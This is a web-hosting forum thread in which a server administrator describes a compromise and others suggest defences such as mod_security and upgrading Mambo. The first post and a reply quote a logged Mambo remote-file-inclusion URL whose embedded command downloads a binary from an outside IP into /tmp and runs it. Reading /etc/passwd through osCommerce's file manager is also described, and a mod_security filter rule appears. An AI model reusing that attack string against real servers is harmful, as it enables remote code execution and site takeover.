HACKED again?!?!

[pcsousa]

Hi all.

Last december my server was hacked: a massive deface using the /tmp executable bug. After that we replace server with a new EV1 HD and cPanel image. We checked /tmp and they are all as a partition on /etc/fstab with something like "/dev/hda3 /tmp ext3 defaults,noexec 1 0".

Today, when I'm running top apllication (I usually run it while I'm working) I saw a ./pt process using lot of resources and running as nobody, I think was nobody. I get in panic and I kill it imediatly. I made a serach over forums.cpanel.net and found that ./pt is maybe an haking attempt. I got some strange IPs from Russia and Turkey (allways the same) at http logs and baned them from my machine. Finaly I made a ls /etc and voila! a ./bc and psybnc files and directory... bc has run permitions. I removed those files but I have a question.... How can they run apllications in /tmp if it is noexec? How do I know what was affected? How can they download applications to my server? Using mambo, oscommerce or phpbb (I usually patch phpbb)?

I can't sleep till I know how can they get in and how can I protect my server!

I found lots of

PHP Code:

/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| 


which seems somebody are using mambo bug to open URLs on other server where they are hacking...

What can I do to avoid mass defaces?
Kind regards!

[jamesbond]

php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|[/PHP]
which seems somebody are using mambo bug to open URLs on other server where they are hacking...

What can I do to avoid mass defaces?
Kind regards!

Do a forum search on mod_security, it's exactly what you need. Besides upgrading mambo ofcourse

[pcsousa]

I think mambo is uptodate... the "h" version I think. Maybe other users. I'm gonna install mod_security.

ty.

[cLub2Share]

it seem to me like they use Shallaccount.. do u have the safe mod Enable ?

[AndyReed]

I think mambo is uptodate... the "h" version I think. Maybe other users. I'm gonna install mod_security.

Although Mod Security is great, it is not a substitute for strong OS and application security. Security is not a "set it and forget it" proposition. Because there are no absolutes, constant monitoring is essential. New attacks are being developed every day and if you're simply going to respond once an attack is discovered it's likely too late. Hackers will use any means to disguise other, more intrusive, exploits. In many cases simply waiting for obvious evidence that you've been hacked means you'll never know you've been hacked. In short, you need to ensure maximum security possible on your server.

[Infopro]

I think mambo is uptodate... the "h" version I think. Maybe other users. I'm gonna install mod_security.

ty.

Mambo was moved to Joomla a few months ago and has had several updates since that point. So if you're running Mambo I think you should upgrade it again.


You'll do yourself good to hire a pro to help with securing your server as well.

I recommend: http://www.configserver.com/

[capoti]

I think mambo is uptodate... the "h" version I think. Maybe other users. I'm gonna install mod_security.

ty.

yip, mambo is no use no more. do yourself a favor and hire a server management company to secure your server. i highly recommend http://servertune.com

[pcsousa]

thank you all for suggestions.

It seems they are using the /admin/file_manager.php from osCommerce application to read files inside the server (like /etc/passwd to know how many users you have, and /home path's; check http://www.opennet.ru/base/cgi/1084898281_16.txt.html) and also to get files inside the server using wget. This /admin/ is a demo store, so there was no password protections. I've already removed it. Also I had the following text to mod_security:

PHP Code:

# WEB-PHP osCommerce bug
SecFilter "filename=\.\./" 


(osCommerce by itself will not use "../", more: do not forget to leave a white line at the end of Mod_Security configuration over cPanel, otherwise cPanel will send an error at the end of the edit page next time)


Mambo is still developed, right? Joombla is a new comunity atarted because Mambo royalties "stupid" idea. More, I saw those mambo references in httpd logs but all of them returns 404 (not found) error. It seems a kind of bug search since for each sequence there are lot of URL testes (post and get), but all 404.